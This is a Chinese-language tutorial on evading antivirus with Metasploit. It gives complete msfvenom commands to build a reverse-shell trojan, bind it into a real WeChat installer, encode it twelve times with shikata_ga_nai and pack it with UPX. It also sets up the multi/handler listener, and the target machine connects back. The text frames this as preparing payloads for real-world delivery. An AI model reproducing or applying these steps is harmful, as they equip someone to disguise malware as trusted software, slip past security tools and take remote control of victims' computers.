免殺，又叫免殺毒技術(shù)，是反病毒，反間諜的對(duì)立面，是一種能使病毒或木馬免于被殺毒軟件查殺的軟件。它除了使病毒木馬免于被查殺外，還可以擴(kuò)增病毒木馬的功能，改變病毒木馬的行為。免殺的基本特征是破壞特征，有可能是行為特征，只要破壞了病毒與木馬所固有的特征，并保證其原有功能沒(méi)有改變，一次免殺就能完成了。免殺技術(shù)也并不是十惡不赦的，例如，在軟件保護(hù)所用的加密產(chǎn)品（比如殼）中，有一些會(huì)被殺毒軟件認(rèn)為是木馬病毒；一些安全領(lǐng)域中的部分安全檢測(cè)產(chǎn)品，也會(huì)被殺毒軟件誤殺，這時(shí)就需要免殺技術(shù)來(lái)應(yīng)對(duì)這些不穩(wěn)定因素。

1、裸奔馬的嘗試

意為不做任何免殺處理的木馬

1、使用msf的msfvenom生成木馬文件，生成一個(gè)裸奔馬，命名為 weixin.exe吧

命令：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe > weixin.exe

2、部署一下kali上的apache服務(wù)，令目標(biāo)機(jī)器能夠訪(fǎng)問(wèn)下載我們生成的木馬

2.1、kali中是自帶有apache的，啟動(dòng)apache服務(wù)

2.2、把生成的weixin.exe文件放在/var/www/html文件夾下

2.3、在靶機(jī)下訪(fǎng)問(wèn)192.168.111.132/weinxin.exe，已經(jīng)下載

2.4、發(fā)現(xiàn)被AV查殺

如果在實(shí)戰(zhàn)中，直接投遞裸奔馬比較容易引起對(duì)方運(yùn)維人員的警覺(jué)，這種方式也比較冒險(xiǎn)，所以在投遞之前，要測(cè)試制作的木馬是否會(huì)引起相關(guān)AV的查殺，比如在在線(xiàn)多引擎病毒識(shí)別工具中去測(cè)試

2.5、這里po一個(gè)在線(xiàn)殺毒查殺的網(wǎng)站，virustotal是一個(gè)提供免費(fèi)的可疑文件分析服務(wù)的網(wǎng)站，它與傳統(tǒng)殺毒軟件的不同之處是它通過(guò)多種反病毒引擎掃描文件。使用多種反病毒引擎對(duì)您所上傳的文件進(jìn)行檢測(cè), 以判斷文件是否被病毒, 蠕蟲(chóng), 木馬, 以及各類(lèi)惡意軟件感染。

2、MSF編碼

在metasploit框架下免殺的方式之一是msf編碼器，功能是使用msf編碼器對(duì)我們制作的木馬進(jìn)行重新編碼，生成一個(gè)二進(jìn)制文件，這個(gè)文件運(yùn)行后，msf編碼器會(huì)將原始程序解碼到內(nèi)存中并執(zhí)行。

1、在kali終端輸入 msfvenom -l encoders，這可以列出所有可用的編碼格式

2、在msf的/data/templates/下有很多metasploit自帶的用于捆綁木馬的程序模板，這個(gè)模塊但是一些反病毒廠(chǎng)商關(guān)注的重點(diǎn)，為了更好的實(shí)現(xiàn)免殺，我們需要自主選擇一個(gè)待捆綁程序。在這里選擇是真正的微信安裝包。（也有對(duì)裸奔馬進(jìn)行shikata_ga_nai編碼饒AV的方法，但是shikata_ga_nai編碼技術(shù)多態(tài)，每次生成的攻擊載荷文件都不一樣，有時(shí)生成的文件會(huì)被查殺，有時(shí)不會(huì)，所以結(jié)合以上思路，生成一個(gè)捆綁木馬，并進(jìn)行shikata_ga_nai編碼）

把微信安裝包放在/root文件夾下

3、使用msfvenom生成一個(gè)Windows環(huán)境下的木馬，并捆綁到WeChatSetup.exe上生成WeChatSetup1.exe的合成馬，同時(shí)對(duì)木馬進(jìn)行x86/shikata_ga_nai進(jìn)行多次編碼的方式進(jìn)行免殺處理。

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

參數(shù)說(shuō)明：

-e /指定編碼方式對(duì)攻擊載荷進(jìn)行重新編碼

-x /指定木馬捆綁在哪個(gè)可執(zhí)行程序模板上

-i /指定對(duì)目標(biāo)進(jìn)行編碼的次數(shù)，多次編碼理論上有助于免殺的實(shí)現(xiàn)

-f /指定msf編碼器輸出程序的格式

-0 /指定處理完畢后的文件輸出路徑

4、把生成的文件放在kali中的apache服務(wù)對(duì)應(yīng)的文件夾下，令攻擊機(jī)訪(fǎng)問(wèn)

5、攻擊機(jī)下載后，在msf上創(chuàng)建監(jiān)聽(tīng)

use exploit/multi/handler

set payload windows/shell/reverse_tcp ///選擇payload為Windows/shell/reverse_tcp

show options ///查看一下哪些選項(xiàng)需要配置

set lhost 192.168.111.132 ///設(shè)置一下主機(jī)地址

set lport 9999 ///設(shè)置下主機(jī)端口，為木馬設(shè)定的端口

run

6、在目標(biāo)機(jī)器上點(diǎn)擊偽造的安裝包，沒(méi)有打開(kāi)，因?yàn)槔壞抉R并多次編碼后，安裝包源文件已經(jīng)損壞，但是在攻擊機(jī)的，目標(biāo)機(jī)器已經(jīng)上線(xiàn)

3、UPX加殼

upx打包器有兩種功能，一種叫做給程序加殼，一種叫壓縮程序，在這里使用打包器的目的是改變后門(mén)程序的特征碼。

壓縮的時(shí)候：它首先可執(zhí)行文件中的可執(zhí)行數(shù)據(jù)解壓出來(lái)，然后將解壓縮用的代碼附加在前面

運(yùn)行的時(shí)候：將原本的可執(zhí)行數(shù)據(jù)解壓出來(lái)，然后再運(yùn)行解壓縮后的數(shù)據(jù)

1、在kali中內(nèi)置了upx打包器，輸入upx可以看下參數(shù)介紹

2、簡(jiǎn)單的命令就是直接upx file，對(duì)file文件進(jìn)行加殼處理，加殼后，因?yàn)榻?jīng)過(guò)壓縮，文件大小會(huì)變小

3、還是老樣子，把上面經(jīng)歷過(guò)編碼后，又加殼的weixin安裝包放在apache服務(wù)的文件夾下，供目標(biāo)機(jī)器讀取下載（如上2.4）

4、在msf上可以創(chuàng)建正常的連接和監(jiān)聽(tīng)，成功傳回

后言

免殺技術(shù)也被安全技術(shù)廠(chǎng)商盯上并開(kāi)發(fā)相對(duì)應(yīng)的檢測(cè)技術(shù)，所以免殺技術(shù)與殺軟技術(shù)是互相促進(jìn)發(fā)展的，而且發(fā)展速度很快，有些現(xiàn)在可以測(cè)試成功的殺軟技術(shù)，過(guò)段時(shí)間就不能用了。免殺技術(shù)還需要狠下功夫去研究，接下來(lái)也會(huì)嘗試python，GO寫(xiě)的免殺，也會(huì)在后續(xù)文章中敘述進(jìn)展！

審核編輯 ：李倩